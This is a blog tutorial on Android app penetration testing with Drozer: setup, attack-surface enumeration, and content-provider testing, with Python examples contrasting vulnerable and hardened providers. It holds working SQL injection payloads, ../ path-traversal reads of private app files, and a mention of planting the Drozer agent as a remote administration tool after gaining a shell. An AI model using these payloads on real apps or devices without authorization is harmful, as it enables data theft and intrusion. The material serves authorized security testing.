
Android App Hacking with Drozer – Usage

This article is for those of you who have already set up Drozer, or who are returning to test your next application a few weeks later and do not quite remember the exact syntax to get Drozer purring.

Reconnecting Drozer – Quickstart

Instead of heading back to the last article on setting up Drozer from scratch, here is the quick start to get back online.

  1. Boot up your Genymotion device that has the Drozer agent installed, open the agent and turn it on (button in the bottom right-hand corner).
  2. Open a console (command line) and change directory to your platform-tools folder.
  3. Type adb forward tcp:31415 tcp:31415 so that the port the Drozer agent listens on is reachable from your workstation.
  4. Change directory to your Drozer folder and type drozer console connect, and you are back in business.

Examining Android Applications with Drozer:

(Screenshot: output of the list command)

At this point, type the command list. This prints every module available to you in this session, much as -h or --help gets you a list of the syntax a command accepts.

(Screenshot: output of app.package.list -f google)

The next command finds the package name of the app you are testing.

run app.package.list -f (name of app or company)

I have given you a few examples above. This searches for the application package that we will be running the additional commands against. As you can see, a search for google pulls up a significant number of applications; fortunately Drozer prints the app label in parentheses after each package name, so it is very easy to identify your application even if you are testing a few at the same time.

For this test I will be using Etar, an open source calendar application. I have already run these commands against it and the tool reports no vulnerabilities, so it serves only to demonstrate the commands; its package name is the one I have already found above.

**Disclosure: please only test applications for which you have written permission from individuals with the authority to authorize testing, that are documented as open source (express permission given: static testing only), or that are your own proprietary applications you are testing for vulnerabilities.

If needed, here are the links for a SOW (Statement of Work) and ROE (Rules of Engagement), both of which are highly recommended on any penetration testing engagement.

Next, find out some more information on the app you will be looking at.

run app.package.info -a (application)

Use the package name found in the screenshot above; in my example it was ws.xsoh.etar, see below.

(Screenshot: output of app.package.info -a ws.xsoh.etar)

As you can see above, the output lists the version number, the data directory, the path to the .apk file, the UID, the permissions the app uses, and any permissions the app defines itself. An app-defined permission is how a company locks its exported components to its own apps, so note which components are gated by one.

You should screenshot this data and save the images as artifacts when submitting your testing documentation (and for your own reference, so you do not have to run these commands again).

If you need to pull an .apk for any reason, see the article already written on MobSF (Mobile Security Framework), where extracting .apk files is documented.

Attack Surfaces

run app.package.attacksurface (application)

This command gets you into the territory that has made Drozer so popular in the mobile application security world. Let's take a look.

(Screenshot: output of app.package.attacksurface for Etar)

As we can see here, 7 activities are exported along with 3 broadcast receivers. An exported component can be invoked by any other app on the device (subject to whatever permission the component declares), which is why it counts as attack surface. As security testers it is up to us to work out whether these exported components are sensitive or vulnerable by design; if they are, we take it a step further and use the other Drozer modules to test and exploit them.

Be aware and on the lookout for a line that may appear at the bottom of the attack surface output:

(Screenshot: the “is debuggable” line)

As security testers this is big. It is almost certainly an item on your mobile application security checklist; if you do not see this line, the application was built without the debuggable flag, which means it is not a development build and has been released appropriately.

So what does it mean if you do see that this application is debuggable?  Good question.

When an application is debuggable it means the development team did not turn this “feature” off before release. For a penetration tester it means you can attach the debugger of your choice to the process, step through every instruction, and execute arbitrary code in the application's context (good times). It also makes adb shell run-as (package) work, which gives you the app's private data directory without rooting the device. The InfoSec Institute has an excellent article on digging deeper when your application is debuggable and injecting runtime code.
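To make the attack surface numbers and the debuggable flag concrete, here is an added example (mine, not drozer's own code, which reads the installed package's metadata through its agent rather than parsing XML) that applies Android's export rules to a manifest and prints the same summary lines app.package.attacksurface does. The manifest, the package name com.example.notes and every component in it are constructed for illustration.

```python
"""What app.package.attacksurface counts, computed from a manifest.

Added example for this article; not drozer's code. The manifest below is
constructed for a hypothetical package, com.example.notes.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
COMPONENT_KINDS = ("activity", "receiver", "service", "provider")

# Constructed sample: two of three activities end up exported, one of two
# receivers does, the service and provider do not, debuggable was left on.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
  <uses-sdk android:minSdkVersion="16" android:targetSdkVersion="28"/>
  <application android:label="Notes" android:debuggable="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".ShareActivity" android:exported="true"
              android:permission="com.example.notes.SHARE"/>
    <activity android:name=".SettingsActivity"/>
    <receiver android:name=".SyncReceiver">
      <intent-filter><action android:name="com.example.notes.SYNC"/></intent-filter>
    </receiver>
    <receiver android:name=".InternalReceiver" android:exported="false">
      <intent-filter><action android:name="com.example.notes.INTERNAL"/></intent-filter>
    </receiver>
    <service android:name=".UploadService"/>
    <provider android:name=".NotesProvider"
              android:authorities="com.example.notes.provider"/>
  </application>
</manifest>
"""


def android_attr(elem, name):
    """Read an android:* attribute, or None when it is absent."""
    return elem.get(ANDROID_NS + name)


def is_exported(component, kind, target_sdk):
    """Android's defaults when android:exported is not written out.

    activity/service/receiver: exported iff it declares an <intent-filter>
    (apps targeting API 31+ must state exported explicitly or they fail to
    install, so the default only matters for older targets).
    provider: exported by default only when targetSdkVersion < 17.
    """
    explicit = android_attr(component, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if kind == "provider":
        return target_sdk < 17
    return component.find("intent-filter") is not None


def attack_surface(manifest_xml):
    """Exported components per kind, plus the debuggable flag."""
    root = ET.fromstring(manifest_xml)
    app = root.find("application")
    uses_sdk = root.find("uses-sdk")
    target_sdk = 1
    if uses_sdk is not None:
        target_sdk = int(android_attr(uses_sdk, "targetSdkVersion")
                         or android_attr(uses_sdk, "minSdkVersion") or 1)
    surface = {
        "package": root.get("package"),
        "debuggable": (android_attr(app, "debuggable") or "false").lower() == "true",
        "exported": {},
    }
    for kind in COMPONENT_KINDS:
        surface["exported"][kind] = [
            {"name": android_attr(c, "name"), "permission": android_attr(c, "permission")}
            for c in app.findall(kind) if is_exported(c, kind, target_sdk)
        ]
    return surface


def unprotected(surface):
    """Exported components with no android:permission gate: any app on the
    device can reach them, so they are the first to poke with
    app.activity.start, app.broadcast.send or app.provider.query."""
    return [c["name"] for kind in COMPONENT_KINDS
            for c in surface["exported"][kind] if c["permission"] is None]


def report(surface):
    """Render the summary in the shape drozer prints it."""
    labels = {"activity": "activities", "receiver": "broadcast receivers",
              "provider": "content providers", "service": "services"}
    lines = ["Attack Surface:"]
    for kind in ("activity", "receiver", "provider", "service"):
        lines.append("  %d %s exported" % (len(surface["exported"][kind]), labels[kind]))
    if surface["debuggable"]:
        lines.append("    is debuggable")
    return "\n".join(lines)


if __name__ == "__main__":
    s = attack_surface(SAMPLE_MANIFEST)
    print(report(s))
    print("reachable without a permission:", unprotected(s))
```

Note that the LAUNCHER activity is exported by design; what matters is the list from unprotected(), which is what you walk through with app.activity.info and app.activity.start next.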

run app.activity.info -a (application)

(Screenshot: app.activity.info output for Etar)

As you can see, this open source application (the new free calendar for Android) reuses basically all of its code from the com.android.calendar packages, which is why I chose it.

When using this next command, look for something that was custom written by the creators: something unique to this app in particular, either a standalone activity or an activity that normally sits behind some kind of authentication page, through which the application can be taken advantage of. You would be amazed at some of the things you can discover (password lists, usernames, developer documentation); just remember to document everything.

run app.activity.start --component (application) (activity)

(Screenshot: an Etar activity started with app.activity.start)

Run each activity, watch how it interacts with the application, change parameters, share items, change settings, and see what can be seen and changed within your mobile application.

Many times app.service.send can be used to send messages to each individual service; other times it may take writing custom Drozer modules to get the output you are after from the application.

Digging Deeper ~

Drozer can build more complex commands beyond just picking activities and running them within the application. You can also type

help

in front of a command to see what options are available to you:

run app.activity.start --component (application) (activity)

(Screenshot: help app.activity.start)

Here we can see that we can drive Drozer with a much more ‘explicit intent’ by using the optional arguments listed in the help output: --action, --category, --data-uri, --extra, --flags and --mimetype let you fill in every part of the intent an activity expects, rather than just naming the component.

(Screenshot: the optional arguments section of the help output)

While there is not much to see in my sample application with these next few commands, it is very important that you keep analyzing the application you are testing with them; I am sure there will be not only content but possible vulnerabilities and findings as well.

Content Provider Information

run app.provider.info -a (app)

This lists the content providers with their authorities, read and write permissions, and path permissions. Please run it even if you have found nothing in the application itself; I have seen a number of times where there are significant vulnerabilities or SQL injection flaws in the content providers of a mobile app.

Drozer Scanner Module

Drozer is also able to search for SQL injection with its scanner modules, and for directory traversal as well.

run scanner.provider.injection -a (app)

run scanner.provider.traversal -a (app)

Run these to find vulnerable content providers that the scanner can reach from its own context.

run scanner.provider.finduris -a (app)

This scanner module builds a list of content URIs that are accessible (it pulls content:// strings out of the APK and tries each one); we can then query those URIs, and possibly modify data in the backing databases.

run app.provider.query content://(content URI from the previous command's output)

Now we have data, but how do we test it?

Here is where your direct knowledge of Android comes into play.

Android leans heavily on SQLite databases for storing snippets, metadata and user data. Since those databases speak SQL, SQL injection is right around the corner: any provider that builds its query by concatenating the projection or selection it was handed will execute whatever you put there. If you don't know SQL, you can learn enough in a day on Codecademy to be dangerous with it.

Here are a few examples of testing for SQL injection:

run app.provider.query content://(content provider)/1 --vertical

Looking at a specific row by appending its id to the URI; --vertical prints one column per line, which is easier to read when rows are wide.

run app.provider.query content://(content provider) --projection "'"

Testing the projection field

run app.provider.query content://(content provider) --selection "'"

Testing the Selection field.

run app.provider.query content://(content provider) --projection "* FROM SQLITE_MASTER WHERE type='table';--"

Use any error messages you receive to craft your requests; try to list all tables, then query specific ones:

run app.provider.query content://(content provider) --projection "* FROM Key;--"

(Key is a table name taken from the table listing; substitute one from your own output.)
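To see exactly why the projection and selection payloads above work, and what the fix looks like, here is an added example (mine, not drozer's code and not any real provider). It models, with Python's sqlite3, a content provider query() that pastes the caller-controlled projection and selection straight into the statement, the way a provider that hands Drozer's arguments unchanged to SQLiteQueryBuilder does, beside a hardened query() that allowlists columns and binds values. The notes and Key tables, their rows, and the probe helper are constructed for the demonstration.

```python
"""The SQL behind drozer's --projection and --selection payloads.

Added example for this article; not drozer's code, not a real app.
The tables and rows are constructed.
"""
import re
import sqlite3


def make_db():
    """A stand-in for the app's SQLite file: a public-ish table and the
    one you actually want (Key, as in the projection payload above)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE notes (_id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE Key (_id INTEGER PRIMARY KEY, Password TEXT, pin TEXT);
        INSERT INTO notes VALUES (1, 'groceries', 'milk, eggs');
        INSERT INTO notes VALUES (2, 'todo', 'rotate API keys');
        INSERT INTO Key VALUES (1, 'hunter2', '1234');
    """)
    return db


def vulnerable_query(db, projection=None, selection=None):
    """Provider that forwards query(uri, projection, selection, ...) as-is:
    the projection list is joined with commas and the selection appended
    verbatim, so both are injection points."""
    cols = ", ".join(projection) if projection else "*"
    sql = "SELECT %s FROM notes" % cols
    if selection:
        sql += " WHERE %s" % selection
    return db.execute(sql).fetchall()


# Hardened version: columns from an allowlist (what setProjectionMap gives
# you), values only through bound parameters (selectionArgs).
ALLOWED_COLUMNS = ("_id", "title", "body")
CLAUSE = re.compile(r"^\s*(\w+)\s*(=|!=|<=|>=|<|>|LIKE)\s*\?\s*$", re.IGNORECASE)


def hardened_query(db, projection=None, selection=None, selection_args=()):
    cols = tuple(projection) if projection else ALLOWED_COLUMNS
    bad = [c for c in cols if c not in ALLOWED_COLUMNS]
    if bad:
        raise ValueError("unknown column(s) in projection: %r" % bad)
    sql = "SELECT %s FROM notes" % ", ".join(cols)
    args = tuple(selection_args)
    if selection:
        # only "column op ?" clauses joined by AND; one bound arg per clause
        clauses = re.split(r"\s+AND\s+", selection.strip(), flags=re.IGNORECASE)
        for clause in clauses:
            m = CLAUSE.match(clause)
            if m is None or m.group(1) not in ALLOWED_COLUMNS:
                raise ValueError("rejected selection clause: %r" % clause)
        if len(clauses) != len(args):
            raise ValueError("selection needs %d selectionArgs, got %d"
                             % (len(clauses), len(args)))
        sql += " WHERE " + " AND ".join(c.strip() for c in clauses)
    return db.execute(sql, args).fetchall()


def probe(query_fn, db, **kwargs):
    """Send one payload and report how the provider reacts, which is what
    scanner.provider.injection does with a single quote: an SQL error in
    the reply proves the input reached the parser. None means it ran."""
    try:
        query_fn(db, **kwargs)
        return None
    except (sqlite3.Error, ValueError) as exc:
        return "%s: %s" % (type(exc).__name__, exc)


if __name__ == "__main__":
    db = make_db()
    # the three payloads from the article, against the vulnerable provider
    print(probe(vulnerable_query, db, projection=["'"]))
    print(vulnerable_query(db, ["* FROM sqlite_master WHERE type='table';--"]))
    print(vulnerable_query(db, ["* FROM Key;--"]))
    # the selection is just as dangerous: a UNION pulls Key through notes
    print(vulnerable_query(db, None, "1=1 UNION SELECT _id, Password, pin FROM Key"))
    # the same payloads never reach SQLite in the hardened provider
    print(probe(hardened_query, db, projection=["* FROM Key;--"]))
    print(hardened_query(db, ["title"], "_id = ?", (2,)))
```

On Android the equivalent of the hardened version is SQLiteQueryBuilder with setProjectionMap and setStrict(true) plus selectionArgs, which is why a provider that reports "unrecognized token" for a lone quote is worth a finding even before you have dumped anything.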

Underlying File Systems

Android keeps each app's private files in its own sandbox; content providers exist to share data, files and information across that boundary with other applications. There are a number of Drozer commands for this, which I will list in a second, but I personally use Root Browser to dig deeper into the application's filesystem, and if I need a file I can use Drozer to download it.

To make sure you have the right file, read it:

run app.provider.read content://(content provider)/data/data/(filename)

Then download it (app.provider.download takes the local destination path as its second argument):

run app.provider.download content://(content provider)/data/data/(filename) (local destination path)

If the provider maps the URI path straight onto the filesystem without canonicalizing it, prefixing the path with ../../../../ walks out of the provider's directory; that is exactly what scanner.provider.traversal probes for.
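The traversal that app.provider.read and scanner.provider.traversal rely on comes from a specific coding mistake in the provider's openFile(). Here is an added example (mine, not drozer's code and not a real provider) that models that mistake in Python beside the canonicalize-and-check fix. The authority com.example.notes.provider, the package name and the directory layout are constructed in a temporary folder.

```python
"""Why app.provider.read can walk out of a provider's directory.

Added example for this article; not drozer's code, not a real provider.
The authority, package and files below are constructed.
"""
import os
import tempfile

AUTHORITY = "com.example.notes.provider"   # hypothetical provider authority


def build_sandbox():
    """Lay out a stand-in for /data/data/com.example.notes:
         files/shared/readme.txt   meant to be served by the provider
         databases/notes.db        private, must never be served
    Returns the files directory the provider is supposed to serve from."""
    app_dir = os.path.join(tempfile.mkdtemp(prefix="drozer-demo-"),
                           "data", "data", "com.example.notes")
    files_dir = os.path.join(app_dir, "files")
    os.makedirs(os.path.join(files_dir, "shared"))
    os.makedirs(os.path.join(app_dir, "databases"))
    with open(os.path.join(files_dir, "shared", "readme.txt"), "w") as fh:
        fh.write("public readme\n")
    with open(os.path.join(app_dir, "databases", "notes.db"), "w") as fh:
        fh.write("SQLite format 3 (constructed stand-in for the real db)\n")
    return files_dir


def uri_path(content_uri):
    """content://authority/a/b -> '/a/b'. Like Uri.getPath(), this does
    not collapse '..' segments; that is the whole problem."""
    rest = content_uri[len("content://"):]
    slash = rest.find("/")
    return rest[slash:] if slash >= 0 else "/"


def vulnerable_open(files_dir, content_uri):
    """new File(getFilesDir() + uri.getPath()): '..' is honoured by the
    kernel when the file is opened, so the caller picks any readable path."""
    with open(files_dir + uri_path(content_uri)) as fh:
        return fh.read()


def hardened_open(files_dir, content_uri):
    """Resolve symlinks and '..' first (File.getCanonicalPath() on
    Android), then require the result to sit below files_dir."""
    base = os.path.realpath(files_dir)
    target = os.path.realpath(base + uri_path(content_uri))
    if not target.startswith(base + os.sep):
        raise PermissionError("URI escapes the provider directory: " + content_uri)
    with open(target) as fh:
        return fh.read()


def try_open(opener, files_dir, content_uri):
    """Run one opener against one URI; None means the provider refused."""
    try:
        return opener(files_dir, content_uri)
    except (PermissionError, FileNotFoundError):
        return None


if __name__ == "__main__":
    files_dir = build_sandbox()
    legit = "content://%s/shared/readme.txt" % AUTHORITY
    # the payload app.provider.read would send; scanner.provider.traversal
    # tries the same '..' prefix for you
    evil = "content://%s/../databases/notes.db" % AUTHORITY
    for name, opener in (("vulnerable", vulnerable_open), ("hardened", hardened_open)):
        print(name, "legit    :", repr(try_open(opener, files_dir, legit)))
        print(name, "traversal:", repr(try_open(opener, files_dir, evil)))
```

The check is on the resolved path, not on the string: rejecting the literal ".." is not enough once URL-encoding or symlinks are involved.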

 

Wrap up ~

It is important to remember that you do not have to memorize EVERYTHING! You just have to know where to find it. If you read this whole article, awesome. If you put the information delivered here to use, even better!

Personally I hack to learn.

Since I do not plan to stop learning, I will definitely not stop hacking!

I hope you do the same.

Hack On.

Cyber Incision Out.

Android App Hacking with Drozer – The Setup

Why Drozer?

MWR Labs (now WithSecure Labs) has done an excellent job putting together this attack framework for Android applications; Drozer rocks. They even have an excellent tutorial to help you get everything set up. What I found when I first learned the tool was that I still needed other resources to complete my setup and get things working; here we bring it all together and get you up and running.

This tool analyzes and displays the attack surface an Android application exposes, and then lets you run its modules and public exploits against the application so you can be sure it has been tested and validated!

This tool can also be used for remote exploits: once a shell is obtained, install the agent payload that Drozer generates, and you have a remote administration tool on your target device.

You should need no other convincing that this tool belongs in your suite of Android testing tools, right next to Mobile Security Framework (MobSF), Burp and Android Studio.

Setup and Install~

First boot up Genymotion (instructions to load this tool are in the MobSF article posted here). Pick an Android device image to emulate running anything from Android 2.1 onwards, and have your application downloaded from the Google Play Store (or sideloaded).

To begin, head over to Team Android's page, download the latest Google platform-tools available and unzip them into your mobile app testing folder (or one that you will remember). Then right-click your command console and run it as an administrator. We need to move into this folder's location in order to use ADB at the command line.

chdir "C:\Desktop\FOLDER\Platform-Tools\"

Replace the path in quotes with the folder's location on your workstation.

adb devices

To run adb in the console you must be in the platform-tools folder (or have added it to your PATH). This matters because the next thing we need to do is install the Drozer agent onto your Genymotion device.

Side note: if using a physical Android device, install the Google USB drivers as shown in the Team Android post, enable USB debugging under Developer options on the phone, then connect it to your workstation with a USB cable and accept the debugging prompt on the screen.

Then type adb devices as shown above in the screen capture.

This pops up a list of the Android devices connected either via USB cable or via the Genymotion emulator; a device listed as “unauthorized” has not yet accepted the debugging prompt, and nothing below will work until it does.

Building for Windows

NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn’t be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software.

We must also have Python on our workstation, as it is a dependency of the Drozer toolset. The 2.x releases built here need Python 2.7; the current WithSecure Labs releases (3.x) run on Python 3, so match the interpreter to the version you check out.

git clone https://github.com/mwrlabs/drozer/
cd drozer
python.exe setup.py bdist_msi

Installing .msi (Windows)

Run dist/drozer-2.x.x.win-x.msi 

**As you download this file, Windows Defender should catch it; click back on the alert and add the entire folder as an exception in Windows Defender and the firewall in order to proceed.

Agent.APK Setup

Now download the Drozer agent .apk file here (this is installed on your Android device so it can communicate with the Drozer console on your workstation).

Stay in your platform tools folder so you can run this adb command and install it onto your Android device using the following command:

adb install "C:\Desktop\FOLDER\Drozer\agent.apk"

Once again, replace the path with your download location of the agent.apk file.

(Screenshot: adb install agent.apk)

You should then see the orange Drozer agent icon on your device. Finally, forward the port Drozer uses with the following adb command:

adb forward tcp:31415 tcp:31415

(Screenshot: Genymotion device setup)

Here you can see the setup I am using.  In Genymotion I have been using Google Nexus 9 – 5.1.0 API 22 devices with a screen size of 1536×1048.

I  find that I like the bigger screen size when working in Geny and it fills exactly half of my UHD display.

(Screenshot: Drozer agent switched on)

Now tap the Drozer agent icon and, in the bottom right-hand corner, tap the “off” button to turn it on; the agent then listens on port 31415 on the device.

Boom, congratulations, you have now set up Drozer and are ready to begin testing your Android application. Install it from the Google Play Store or sideload it into your Genymotion device, then head back to your command line.

You will navigate over to your Drozer folder which has all of the program files within it and run:

drozer console connect

***On a real (not emulator) Android device that you reach over the network rather than through adb forward, the IP of the device must be specified: drozer.bat console connect --server 192.168.0.9
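The steps above (and the reconnect quick start at the top of the usage article) are the same three commands every time, and the step that silently fails is the device check. Here is an added helper (mine, not part of drozer) that wraps them: it parses adb devices, refuses to continue on an unauthorized or offline device, forwards port 31415 for the chosen serial, and launches the console. It assumes adb and drozer (drozer.bat on Windows) are on your PATH; SAMPLE_ADB_DEVICES is a constructed copy of what adb devices prints for a Genymotion VM plus a phone that has not yet accepted the debugging prompt.

```python
"""Reconnect helper for drozer: pick the device, forward the port, connect.

Added example for this article; not part of drozer. Assumes adb and
drozer/drozer.bat are on PATH. SAMPLE_ADB_DEVICES is constructed.
"""
import os
import subprocess
import sys

DROZER_PORT = 31415

SAMPLE_ADB_DEVICES = """List of devices attached
192.168.56.101:5555\tdevice
ZY22ABCDEF\tunauthorized

"""

# what each non-ready state means in practice
STATE_HINTS = {
    "unauthorized": "accept the USB debugging prompt on the device",
    "offline": "re-plug the cable or restart the VM, then run adb kill-server",
    "no": "adb cannot talk to the device (driver/udev permissions)",
}


def parse_adb_devices(output):
    """'adb devices' text -> [(serial, state), ...] in the order printed."""
    rows = []
    for line in output.splitlines()[1:]:   # skip the "List of devices attached" header
        parts = line.split()
        if len(parts) >= 2:
            rows.append((parts[0], parts[1]))
    return rows


def pick_device(output):
    """(serial, None) for the first device in the 'device' state, otherwise
    (None, hint) explaining why nothing is usable yet."""
    devices = parse_adb_devices(output)
    for serial, state in devices:
        if state == "device":
            return serial, None
    if not devices:
        return None, "adb sees no devices: start the Genymotion VM or plug in the phone"
    serial, state = devices[0]
    return None, "%s is %s: %s" % (serial, state, STATE_HINTS.get(state, "check adb"))


def forward_argv(serial, port=DROZER_PORT):
    """adb -s <serial> forward tcp:31415 tcp:31415; -s matters as soon as
    more than one device is attached."""
    return ["adb", "-s", serial, "forward", "tcp:%d" % port, "tcp:%d" % port]


def console_argv(server=None):
    """drozer console connect, with --server for an agent reached over Wi-Fi."""
    exe = "drozer.bat" if os.name == "nt" else "drozer"
    argv = [exe, "console", "connect"]
    if server:
        argv += ["--server", server]
    return argv


def main(argv):
    listing = subprocess.run(["adb", "devices"], capture_output=True,
                             text=True, check=True).stdout
    serial, hint = pick_device(listing)
    if serial is None:
        sys.exit(hint)
    subprocess.run(forward_argv(serial), check=True)
    server = argv[1] if len(argv) > 1 else None   # optional host[:port]
    return subprocess.call(console_argv(server))


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it with no arguments for the adb forward case, or pass the device IP to reproduce the --server form shown above.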

(Screenshot: Drozer console connected)

If you are already knowledgeable on the inner workings of Android Testing Tool Drozer, hack on.  If not follow me on over to my next post.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

In this article we jumped between three main sources; none of them gets you completely set up by itself, which is why I have put all the steps together into this one article, your one-stop shop here at Cyber Incision.

  • The first is from Team Android, which gets you up and running with ADB (<—gotta have it) and Fastboot on Windows 10.
    • This set of tools is also known as the Android SDK Platform-Tools (follow this link to set it up), a command line toolkit that lets you run operations on your Android device and emulator that would not otherwise be possible.
  • The second article worth reading is from the INFOSEC Institute, which has provided an excellent introduction to Drozer and can be used as a reference for many of the commands you will see here.
  • Finally there is the MWR Drozer instruction manual, an excellent reference point, especially once you get past the introductory learning curve and begin using the Drozer modules.